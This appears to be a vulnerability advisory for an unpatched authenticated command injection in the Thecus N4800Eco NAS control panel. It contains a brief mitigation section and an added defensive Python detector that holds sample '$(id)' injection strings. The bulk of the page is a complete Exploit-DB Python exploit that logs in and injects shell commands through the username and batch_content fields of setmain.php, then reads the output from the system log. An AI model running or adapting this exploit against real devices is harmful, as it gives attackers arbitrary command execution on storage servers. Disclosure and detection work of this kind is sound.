Vendor: N4800Eco Nas Server Control Panel
By: Metin Yunus Kandemir
CVSS: 9.8 (HIGH)
CWE: 78 (Command Injection)
Product Name: N4800Eco Nas Server Control Panel
Affected Version From: N4800Eco
Affected Version To: N4800Eco
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Linux
Year: 2021

Thecus N4800Eco Nas Server Control Panel – Command Injection

The Thecus N4800Eco Nas Server Control Panel is vulnerable to command injection. An attacker can exploit this vulnerability by sending malicious input to the web application. This can allow the attacker to execute arbitrary commands on the vulnerable system.

Mitigation:

Input validation should be used to prevent command injection attacks. Additionally, the application should be configured to use the least privileged user account.
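
An added example, not part of the original advisory or the vendor's code: one way to express the input-validation advice as an allowlist check, and to flag requests to the two endpoints used in the PoC below whose name field fails it. The allowlist pattern, the function names, the sample requests and the reading of the first comma-separated batch item as the account name are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Assumption: account names are limited to a conservative POSIX-style set.
SAFE_NAME = re.compile(r"[A-Za-z_][A-Za-z0-9_.-]{0,31}")
# Endpoint ("fun") and field names are taken from the PoC on this page.
WATCHED = {"setlocaluser": "username", "setbatch": "batch_content"}

def fully_decode(value, max_rounds=5):
    """Percent-decode until stable; the PoC's batch_content arrives double-encoded."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_safe_name(name):
    """Allowlist check: reject anything outside the expected account-name set."""
    return SAFE_NAME.fullmatch(name) is not None

def suspicious_fields(url, body):
    """Return (field, decoded_value) pairs in one POST that fail the allowlist."""
    parts = urlsplit(url)
    if not parts.path.endswith("/adm/setmain.php"):
        return []
    field = WATCHED.get(parse_qs(parts.query).get("fun", [""])[0])
    hits = []
    for raw in parse_qs(body, keep_blank_values=True).get(field, []):
        value = fully_decode(raw)
        # Assumption: the first comma-separated item of each batch line is the name.
        names = [ln.split(",")[0] for ln in value.splitlines()] if field == "batch_content" else [value]
        if not all(is_safe_name(n) for n in names):
            hits.append((field, value))
    return hits

# Constructed sample requests (URL, form body), not captured traffic.
SAMPLES = [
    ("/adm/setmain.php?fun=setlocaluser", "action=delete&username=backupuser"),
    ("/adm/setmain.php?fun=setlocaluser", "action=delete&username=%24%28id%29"),
    ("/adm/setmain.php?fun=setbatch", "batch_content=%2524%28id%29%252C22222%252C9999"),
]

if __name__ == "__main__":
    for url, body in SAMPLES:
        print(url, suspicious_fields(url, body) or "ok")
```

The same allowlist belongs in the server-side handler itself; checking logged requests only helps spot attempts.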

Exploit-DB raw data:

# Exploit Title: Thecus N4800Eco Nas Server Control Panel - Command Injection
# Date: 01/06/2021
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: http://www.thecus.com/
# Software Link: http://www.thecus.com/product.php?PROD_ID=83
# Version: N4800Eco
# Description: https://docs.unsafe-inline.com/0day/thecus-n4800eco-nas-server-control-panel-comand-injection


#!/usr/bin/python3
import requests
import sys
import urllib3


# To fix SSL error that occurs when the script is started.
# 1- Open /etc/ssl/openssl.cnf file
# At the bottom of the file:
# [system_default_sect]
# MinProtocol = TLSv1.2
# CipherString = DEFAULT@SECLEVEL=2
# 2- Set value of MinProtocol as TLSv1.0


def readResult(s, target):
    d = {
        "fun": "setlog",
        "action": "query",
        "params": '[{"start":0,"limit":1,"catagory":"sys","level":"all"}]'
    }
    url = "http://" + target + "/adm/setmain.php"
    resultReq = s.post(url, data=d, verify=False)
    fields = resultReq.text.split()
    print("[+] Reading system log...\n")
    print(fields[5:8])     # change this range to read the whole output of the command

def delUser(s, target, command):
    d = {
        "action": "delete",
        "username": "$("+command+")"
    }
    url = "http://" + target + "/adm/setmain.php?fun=setlocaluser"
    delUserReq = s.post(url, data=d, allow_redirects=False, verify=False)

    if 'Local User remove succeeds' in delUserReq.text:
        print('[+] %s command was executed successfully' % command)
    else:
        print('[-] %s command was not executed!' %command)
        sys.exit(1)
    readResult(s, target)

def addUser(s, target, command):
    d = {'batch_content': '%24('+command+')%2C22222%2C9999'}
    url = "http://" + target + "/adm/setmain.php?fun=setbatch"
    addUserReq = s.post(url, data=d, allow_redirects=False, verify=False)

    if 'Users and groups were created successfully.' in addUserReq.text:
        print('[+] Users and groups were created successfully')
    else:
        print('[-] Users and groups were not created')
        sys.exit(1)
    delUser(s, target, command)

def login(target, username, password, command=None):
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    s = requests.Session()
    d = {
        "&eplang": "english",
        "p_pass": password,
        "p_user": username,
        "username": username,
        "pwd": password,
        "action": "login",
        "option": "com_extplorer"
    }
    url = "http://" + target + "/adm/login.php"
    loginReq = s.post(url, data=d, allow_redirects=False, verify=False)

    if '"success":true' in loginReq.text:
        print('[+] Authentication successful')
    elif '"success":false' in loginReq.text:
        print('[-] Authentication failed!')
        sys.exit(1)
    else:
        print('[-] Something went wrong!')
        sys.exit(1)
    addUser(s, target, command)

def main(args):
    if len(args) != 5:
        print("usage: %s targetIp:port username password command" % (args[0]))
        print("Example 192.168.1.13:80 admin admin id")
        sys.exit(1)
    login(target=args[1], username=args[2], password=args[3], command=args[4])


if __name__ == "__main__":
    main(args=sys.argv)